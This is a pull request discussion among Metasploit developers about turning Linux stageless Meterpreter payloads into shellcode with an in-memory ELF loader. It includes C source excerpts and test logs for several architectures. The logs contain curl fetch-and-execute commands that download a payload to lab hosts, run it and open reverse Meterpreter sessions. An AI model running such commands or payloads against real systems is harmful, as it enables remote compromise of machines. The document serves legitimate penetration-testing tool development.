Fix Linux Stageless Payload to be Shellcodes

[dledda-r7]

This PR Fixes the issue of linux stageless meterpreter.
Issue: #19670

Issue Description

The stageless linux meterpreters are ELF files that cannot be used as standard stageless shellcode payload.

Staged vs Stageless Linux Meterpreter

Staged

The Linux staged meterpreter is divided in 3 component

• A stager (connect back to msf to download the next stage)
• an intermediate stager that download the ELF on a RWX mmap, setup the stack and and jump on the e_entry of the ELF
• the Process Hollowing Friendly version of mettle's ELF

This version of the ELF is generated when we build mettle using the following tool: elf2bin

Stageless

The stageless mettle payload is the ELF file (standard elf) with the patched args.

Code Handling Staged vs Stageless

Mettle main.c

	/*
	 * Check to see if we were injected by metasploit | staged
	 */
	if (strcmp(argv[0], "m") == 0) {
		flags |= PAYLOAD_INJECTED;

		/*
		 * There is a fd sitting here, trust me
		 */
		int fd = (int)((long *)argv)[1];
		char *uri;
		if (asprintf(&uri, "fd://%d", fd) > 0) {
			struct c2 *c2 = mettle_get_c2(m);
			c2_add_transport_uri(c2, uri);
			free(uri);
		}
		parse_default_args(m, flags);
	} else {

#ifndef HAVE_SETPROCTITLE
		/* Prepare for later setproctitle emulation */
		saved_argv = calloc(argc + 1, sizeof(*saved_argv));
		for (int i = 0; i < argc; i++) {
			saved_argv[i] = strdup(argv[i]);
		}
		compat_init_setproctitle(argc, argv);
		argv = saved_argv;
#endif

		parse_default_args(m, flags);    // <- MSFVENOM REPLACE THE DEFAULT OPTION PARSED HERE
		if (parse_cmdline(argc, argv, m, flags)) {
			return -1;
		}
	}

Solution

For each architecture, a shellcode implementing this technique was made.
NOTE: This technique works only with Kernel >= 3.17

Instead of delivering the ELF only, the raw shellcode will be composed by the in-memory-loader arch specific shellcode and the elf file at the end of it.

Super thanks to @msutovsky-r7

What architectures fix this pr:

• linux/x86
• linux/x64
• linux/armle
• linux/armbe (emulated)
• linux/aarch64
• linux/mips
• linux/mipsel (to check device avaiability)
• linux/mips64 (find target with kernel 3.17 / updated one of the targets)
• linux/ppc ( to be removed)
• linux/ppc64le (emulated)
• linux/ppce500v2
• linux/zarch (emulated)

What is inside the PR and How to test it

• The <arch>/in_memory_loader.rb include the architecture specific shellcode to be prepended to the ELF binary.
• The addition to an empty <arch>/prepends.rb mixin for the missing architectures.
• Templates ELF binary and sources for missing architectures.
• The creation of a Mettle-specific datastore option for the selection of the binary compatibility to 2.6 or to 3.17 kernels.
• warning display if a prepends is applied when the kernel ds option is 2.6.
• Modification of the meterpreter_reverse.erb template for payload generation.

What to test

• Ensure the ELF delivered when MeterpreterLinuxMinKernel is 2.6+ is the same as before
• Ensure the ELF delivered when MeterpreterLinuxMinKernel is 3.17 is using the correct ELF template and is executed on a compatible target.
• Ensure the prepends are applied on the payload when MeterpreterLinuxMinKernel is 3.17 otherwise a warning is showed.

[bwatters-r7]

This makes a lot of sense- my only complaint is that we need to comment the asm a lot more, especially when you're doing shenanigans. 😆

[bwatters-r7]

Also, what are you using to test this? Do you have a elf that supports injection, or are you only testing by creating an elf stager from the shellcode?

[msutovsky-r7]

Also, what are you using to test this? Do you have a elf that supports injection, or are you only testing by creating an elf stager from the shellcode?

I generated ELF file using msfvenom and for actual testing, I used mostly qemu-static-[arch]. For some architectures, that was bit problem, like s390, so in that case, I had Linux OS running through qemu. So generally, for testing, I used qemu.

[bwatters-r7]

Minor cheat sheet additions

[bwatters-r7]

x64

msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use payload/cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
[*] Command served: curl -so ./YcZpMZsOWVJ http://10.5.135.201:8080/s-Ca9BmTKo-IpFX8XiUd8w;chmod +x ./YcZpMZsOWVJ;./YcZpMZsOWVJ&
[*] Command to run on remote host: curl -s http://10.5.135.201:8080/aoG3_q_U5dSCB61zrJpJEQ|sh
[*] Payload Handler Started as Job 2
msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /s-Ca9BmTKo-IpFX8XiUd8w
[*] Adding resource /aoG3_q_U5dSCB61zrJpJEQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.134.164 requested /aoG3_q_U5dSCB61zrJpJEQ
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Client 10.5.134.164 requested /s-Ca9BmTKo-IpFX8XiUd8w
[*] Sending payload to 10.5.134.164 (curl/7.81.0)
[*] Meterpreter session 1 opened (10.5.135.201:4585 -> 10.5.134.164:41258) at 2025-06-10 14:44:18 -0500

msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.134.164
OS           : Ubuntu 22.04 (Linux 6.8.0-1028-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[bwatters-r7]

AARCH64

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 3.17+ 
MeterpreterLinuxMinKernel => 3.17+
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set prependsetuid true
prependsetuid => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > set verbose true
verbose => true
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SDeLtHAov http://10.5.135.201:8080/TQMDQzG-j3qlgupsFHwcUQ;chmod +x ./SDeLtHAov;./SDeLtHAov&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /TQMDQzG-j3qlgupsFHwcUQ
[*] Started reverse TCP handler on 10.5.135.201:4585 
[*] Client 10.5.132.214 requested /TQMDQzG-j3qlgupsFHwcUQ
[*] Sending payload to 10.5.132.214 (curl/8.11.0)
[*] Meterpreter session 2 opened (10.5.135.201:4585 -> 10.5.132.214:48214) at 2025-06-10 14:47:11 -0500

msf6 payload(cmd/linux/http/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.5.132.214
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: kali

[bwatters-r7]

ARMLE

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set meterpreterlinuxminkernel 3.17+ 
meterpreterlinuxminkernel => 3.17+
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > set prependsetuid true 
prependsetuid => true
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./WZmRLbLOTRP http://10.5.135.201:8080/OcFXJxS3XJGwQI9E1fvCLA;chmod +x ./WZmRLbLOTRP;./WZmRLbLOTRP&
[*] Payload Handler Started as Job 0
msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /OcFXJxS3XJGwQI9E1fvCLA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.212 requested /OcFXJxS3XJGwQI9E1fvCLA
[*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.212:42594) at 2025-06-11 14:01:42 -0500

msf6 payload(cmd/linux/http/armle/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.212
OS           : Debian  (Linux 5.15.44-Re4son-v7+)
Architecture : armv7l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
meterpreter > getuid

[bwatters-r7]

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT
The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

[msutovsky-r7]

MIPSLE

This fails with segfault. I'm running it on a router, so I cannot get GDB installed, but gdb server works.

(gdb) target remote 10.5.134.135:6785
Remote debugging using 10.5.134.135:6785
Reading /home/ubnt/nHMEUdqNk from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /home/ubnt/nHMEUdqNk from remote target...
Reading symbols from target:/home/ubnt/nHMEUdqNk...
(No debugging symbols found in target:/home/ubnt/nHMEUdqNk)
Reading /usr/lib/debug/.build-id/5a/dc2f32cfab9c3295eff7905db52e01ef1771f0.debug from remote target...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
0x00400054 in ?? ()
(gdb) start
The "remote" target does not support "run".  Try "help target" or "continue".
(gdb) continue
Continuing.
process 3834 is executing new program: /memfd: (deleted)
Reading /memfd: (deleted) from remote target...
warning: "target:/memfd: (deleted)": could not open as an executable file: No such file or directory.
Reading /memfd: (deleted) from remote target...
warning: `target:/memfd: (deleted)': can't open to read symbols: No such file or directory.

Program received signal SIGSEGV, Segmentation fault.
0x77fb5dd0 in ?? ()

Linux version:

ubnt@ubnt:~$ Linux ubnt 4.14.54-UBNT #1 SMP Thu Jun 15 09:00:10 UTC 2023 mips GNU/Linux

EDIT The "legacy" meterpreter works.

msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set MeterpreterLinuxMinKernel 2.6+ 
MeterpreterLinuxMinKernel => 2.6+
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > set prependsetuid false
prependsetuid => false
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./ViIsYiXmd http://10.5.135.201:8080/CT_Drzu24xtplYEAbOltEg;chmod +x ./ViIsYiXmd;./ViIsYiXmd&
[*] Payload Handler Started as Job 3
msf6 payload(cmd/linux/http/mipsle/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /CT_Drzu24xtplYEAbOltEg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.134.135 requested /CT_Drzu24xtplYEAbOltEg
[*] Sending payload to 10.5.134.135 (curl/7.52.1)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.135:33584) at 2025-06-11 16:58:28 -0500

It's causing segfault on this instruction:

0x77fb5dd0    lb     $v0, ($a0)     <Cannot dereference [0]>

So the issue is with Meterpreter itself - on qemu, it seems to be working though.

UPDATE:
It seems like the issue is with execveat instruction, which works, but somehow, it's not. Everything works as expected until that syscall - running file descriptor from different shell will run meterpreter. But somehow, spawning process with execveat breaks something and the meterpreter doesn't work.

[bwatters-r7]

I am, in fact, crazy

[bwatters-r7]

If we are going to remove the PPC, do we need the ppc files in here? We have templates, prepends, payloads, and a loader in this PR?
Also, it might be a good idea to change the error message above, since the problem is not that we don't support the arch or platform, we don't support the Minimum kernel level:

msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 3.17+ 
PayloadLinuxMinKernel => 3.17+
msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > to_handler
[-] Exploit failed: Failed to generate an executable payload due to an invalid platform or arch.
msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 2.6+ 
PayloadLinuxMinKernel => 2.6+
msf payload(cmd/linux/http/ppc/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./loAlOlFnqst http://10.5.135.201:8080/JY-6pdFD6VFwW21Ds-tzNQ;chmod +x ./loAlOlFnqst;./loAlOlFnqst&

[bwatters-r7]

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./MYTRDUzk http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./MYTRDUzk;./MYTRDUzk&
[*] Payload Handler Started as Job 2
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:43288) at 2025-10-28 16:04:18 -0500

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           : Debian 9.13 (Linux 4.9.79-UBNT)
Architecture : mips64
BuildTuple   : mips64-linux-muslsf
Meterpreter  : mips64/linux
meterpreter > getuid
Server username: ubnt
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: User exit
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > [*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: Died

msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > set PayloadLinuxMinKernel 3.17 
PayloadLinuxMinKernel => 3.17
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SsMEzUcPWTv http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./SsMEzUcPWTv;./SsMEzUcPWTv&
[*] Payload Handler Started as Job 3
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[-] Exploit failed: RuntimeError unknown: Failed to add resource
bad-config: Resource collision detected. Set FETCH_URIPATH to a different value to continue.
Interrupt: use the 'exit' command to quit
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > to_handler
[*] Command to run on remote host: curl -so ./SMwsvbqbCFdr http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA;chmod +x ./SMwsvbqbCFdr;./SMwsvbqbCFdr&
[*] Payload Handler Started as Job 4
msf payload(cmd/linux/http/mips64/meterpreter_reverse_tcp) > 
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)
[*] Client 10.5.132.224 requested /8Z4ZAzIC6g6LyRMRHt_ybA
[*] Sending payload to 10.5.132.224 (curl/7.52.1)

ubnt@ubnt:~$ curl -so ./SMwsvbqbCFdr http://10.5.135.201:8080/8Z4ZAzIC6g6LyRMRHt_ybA
ubnt@ubnt:~$ ls -l
total 3304
-rwxr-xr-x    1 ubnt     users      1685392 Jan  2 02:05 MYTRDUzk
-rwxr-xr-x    1 ubnt     users      1685612 Jan  2 02:08 SMwsvbqbCFdr
ubnt@ubnt:~$ chmod 755 SMwsvbqbCFdr
ubnt@ubnt:~$ ./SMwsvbqbCFdr
Bus error
ubnt@ubnt:~$ 

[bwatters-r7]

[dledda-r7]

@bwatters-r7 we are going to replace execveat back with the itoa + execve this might take a while. after that we will need to retest everything

[dledda-r7]

@bwatters-r7 @msutovsky-r7 just a ping that we should be back on track here, we did the rollback of itoa + execve so that edge case should be a problem anymore... I'll start retesting some of the systems